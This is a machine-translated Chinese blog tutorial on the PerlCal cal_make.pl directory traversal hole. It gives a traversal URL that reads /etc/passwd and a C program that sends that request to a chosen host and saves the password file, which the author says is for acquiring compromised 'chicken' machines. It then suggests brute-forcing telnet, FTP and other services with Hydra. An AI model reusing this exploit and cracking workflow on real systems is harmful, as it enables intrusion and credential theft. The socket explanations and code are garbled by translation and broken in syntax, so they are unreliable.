Linux C programming five CAL

xiaoxiao2021-03-06  61

LINUX C programming five cal_make.pl vulnerability scanner

One idea:

This is the use of Showflie class vulnerabilities to get the password documentation of the remote host, the usage is basically the same, can be said to be a sister! Vulnerability Description:

Vulnerability Name: Perlcal Directory Traversal Vulnerability Overview: There is a vulnerability, remote attacker can use "../" technology traversal other directory affected by other directories other than the web root directory: Acme Software PerlCal 2.95 ACME Software Perlcal 2.9e Acme Software Perlcal 2.9d Acme Software PerlCal 2.9c Acme Software PerlCal 2.9b Acme Software PerlCal 2.9a Acme Software PerlCal 2.9 Acme Software PerlCal 2.80 Acme Software PerlCal 2.7 Acme Software PerlCal 2.6 Acme Software PerlCal 2.5 Acme Software PerlCal 2.4 Acme Software PerlCal 2.3 Acme Software PerlCal 2.18 Acme Software Perlcal 2.13

description:

Perlcal is the CGI script developed by ACME Software, providing web-based calendar features. This script has a vulnerability, and the remote attacker can use the ".." technology to traverse other directories other than the web root directory, only by the Web service. Normally, the web service runs as a Nobody user. Vulnerability Test Method and Vulnerability Test Procedure: Submit the following URL request:

Http://www.example.com/cgi-bin/cal_make.pl? p0 = .. / .. / .. / .. / .. /. / .. / .. / .. / .. / . ../../etc/passwd

Will display / etc / passwd file content

II. Function Description: Another Socket programming knowledge, don't bother! ? 1. Type of socket socket_streamsocket_dgramsocket_rawsocket_seqpacketsocket_rdm

2. Slim address structure SockAddr_insockAddrin_ADDR

3. The implementation process of TCP socket:

Service-Terminal

Socket () | bind () | client listen () socket () | | accept () <- Coordinate connection ---- connection () | | rv () <--- Data Request -------- Send () <- ---- Data Response ----> Recv () - | | RECV () <---- end connection ------ Close () | Close ()

The following specifically introduces several important functions:

1. Socket (): 1.1 prototype: #include #incldue int design (int domain); 1.2 function description: call the socket function to get a file Descriptor Domain: Protocol clusters and address clusters, the most commonly used AF_INET (IPv4 protocol) and AF_INET6 (IPv6 protocol)

TYPE: Communication Type SOCK_STREAM (byte Jacket Interface), SOCK_DGRAM (Data Supply Set) and SOCK_RAW (Original Set Interface) Protocol: The protocol used is 0, and the system is automatically selected. 1.3 Return value: successfully returned non-zero, failed to return -1.

2.Connect (): 2.1 Prototype: #include #include int connection (int name, int namelen); 2.2 Description: Call connection CONNECT Syndrographic indicating the address of the remote end S is the socket () function returned by the socket descriptor name is a pointer containing the remote host IP address and port number is the length of the remote address structure 2.3 Return value to return 0, failed to return -1

3.send (): 3.1 prototype: #include #include int send (int SEND (int S, const void * msg, size_t len, int flags); 3.2 Description: s is Accept () returned to the socket descriptor for the client is a socket descriptor returned. The MSG is a data buffer to a transmission information. LEN indicates that the size of the transmitted data buffer is the transfer control flag, which is defined as follows: 0 MSG_DONTROUT Send data by the most direct path, and ignores the routing settings of the underlying protocol. If Flags is 0, then READ Write the same operation 3.3 Return value successfully returns the length of the transmitted data, with bytes, failed to return -1.

4.Recv (): 4.1 Prototy: #include #include int RECV (int S, void * buf, size_t len, int flags); 4.2 Description: s is Accept () Returns the socket descriptor, for the customer is a socket descriptor returned. BUF is a data buffer that contains accept information. Len and Flags are the same. 4.3 Return value successfully returns the received data length, failed to return -1.

5.GethostByname (): 5.1 Prototype: String gethostByname (String hostname); 5.2 Description: This function returns an IP URL (IP Address) of a machine name (Domain Name). If the execution fails, return the original machine name.

6. SockAddr_in structure: 6.1 Structure: SockAddr_in defines in Netinet / in.h: struct sockaddr_in {short int sin_family; / * protocol * / unsigned short int sin_port; / * port number * / struct in_addr sin_addr; / * Network address * / unsigned char sin_zero [8]; / * Keep and SOCKADDR Structures * /}; 6.2 Description: Use the SockAddr_in structure to set / obtain address information. SIN_FAMILY refers to the protocol, which can only be AF_INITSIN_PORT storage port number (using network byte order) SIN_ADDR to store IP addresses, using IN_ADDR {UNSIGNED long s_addr;}; this data structure is due to historical reasons The reserved is mainly used as a previous format. S_addr Stores the IP Address SIN_ZERO in the network byte sequence to keep the SockAddr to maintain the same empty byte that remains the same as the SOCKADDR_IN. 6.3 Example: Struct SockAddr_in sa; sa.sin_family = AF_INET; sa.sin_port = HTONS (3490); / * short, nbo * / sa.sin_addr.s_addr = inet_addr ("132.241.5.10"); Bzero (& (SA. SIN_ZERO, 8); Note: If sa.sin_addr.s_addr = INADDR_ANY, the IP address 7.Hostent structure 7.1 structure: This data structure is defined as follows: struct hostent {char * h_name; / * The official name of the host * / Char ** h_aliases; / * Host alias * / int h_addrtype; / * Return the address type, generally AF_INET * / INT H_LENGTH; / * Address byte length * / char ** h_addr_list / * Host network address * /}

3. Programming:

Under Linux: Create file Nightcat @ nightcat $ vi calmake.c Editing the following: / * The calmake canner version 1.0 * * One Simple Method Generate Linux Chicken Is To Search CGI Script Way-Board.c * Gi and Use My Small Tools To Get the passwd.txt * * * to completion: * user $ gcc -o calmake calmake.c * * to use: * user $. / calmake somedomain.com Directory (ie ./calmake antion.com) * * Coded by nightcat * MARCH 2004 * * /

#include #include #include #include #include #include #include #include #include #include #include

INT Main (int Argc, char * argv []) {Int S; struct in_addr addr; struct sockaddr_in vic; struct hostent * brad; char buffer [1024]; file * fp; char cgihole [300]; if (argc! = 3) {EXIT (Printf ("/ Nusage:% s Domain.com Directory", Argv [0])); / *** Note 1 *** /} Sprintf (cgihole, "get% s http / 1.0 / n / N ", Argv [2]); Printf ("% s ", cgihole); if ((BAD = gethostByname) == null) {EXIT (" "" "" "Error Getting Hostname / N") }

Printf ("Check the Hole / N"); Printf ("Coded by Nighcat / N");

System ("Sleep 2");

S = socket (AF_INET, SOCK_STREAM, 0); if (s <0) exit (Printf ("Socket Error / N");

Bcopy (Bad-> h_addr, (char *) & victem.sin_addr, bad-> h_length; victem.sin_family = AF_INET; VICTEM.SIN_PORT = HTONS (80); IF (Connect (S, (S, Struct SockAddr *) & VicTem, Sizeof (VICTEM) <0) {EXIT (Printf ("Connect Error / N"));} Printf ("/ Ngetting Host's Passwd.txt / N / N"); if ((fp = fopen ("getPasswd.txt" , "W")) == null) {EXIT (Printf ("Cann't open file"));} Send (s, cgihole, sizeof (cgihole), 0); while (RECV (S, Buffer, Sizeof) Buffer, 0)> 0) {/ *** Note Two *** / FPRINTF (FP, "% S", Buffer;} fclose (fp); close (s);}

Save Exit: WQ Compilation Perform: $ GCC -O Calmake Calmake.c $. / CALMAKE TARGETIP /CAL_MAKE.PL ?/ =../../../....../../../ .. /../../....../tc/passwd gets and manually utilized two, the same user document.

You can get the normal user of the host with a method of cracking. I like to use Hydra to crack $. / Hydra -f /root/passwd.txt targetip telnet Detailed look at his description! You can also crack other services. FTP / VNC / SMTP, etc.!

IV. Note One: Here is the format of the input. In fact, this program can use other ShowFile vulnerabilities. Note 2: Here you need to use the While judgment to accept all return data, I have been a long time here. I understand it! This means that if the data is more than zero, continue to write to the file until the data is written.

Five contact me:

Nickname: NIGHTCATE-mail: ncnynl@hotmail.comqq: 1043931icq: 153436005

转载请注明原文地址:https://www.9cbs.com/read-119309.html

New Post(0)